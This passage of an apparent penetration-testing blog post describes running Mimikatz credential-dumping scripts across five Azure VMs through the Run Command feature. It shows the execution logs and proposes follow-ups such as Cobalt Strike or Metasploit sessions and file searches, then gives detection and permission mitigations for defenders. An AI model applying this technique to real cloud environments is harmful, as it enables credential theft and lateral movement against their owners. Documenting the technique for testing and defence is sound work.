VERBOSE: Running .\Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds

Mimikatz Med

The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 Minutes and 14 seconds. It’s not ideal (see below), but it’s functional. I haven’t taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That’s nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:

  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for sensitive files
  • Running domain information gathering scripts on one VM and using the output to target other specific VMs for code execution

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands.

Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders who are reading this, please be careful with your Owner and Contributor rights. If you have one takeaway from this post, let it be this: Contributor rights mean SYSTEM rights on all the VMs.

If you want to cut down your contributor’s rights to execute these commands, create a new role for your contributors and limit the Microsoft.Compute/virtualMachines/runCommand/action permissions for your users.

Additionally, if you want to detect this, keep an eye out for the "Run Command on Virtual Machine" log entries. It's easy to set up alerts for this, and unless Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command.

The following alert logic will let you know when anyone tries to use this command (Success or Failure). You can also extend the scope of this alert to All VMs in a subscription.

Alertlogic

As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst Github page.
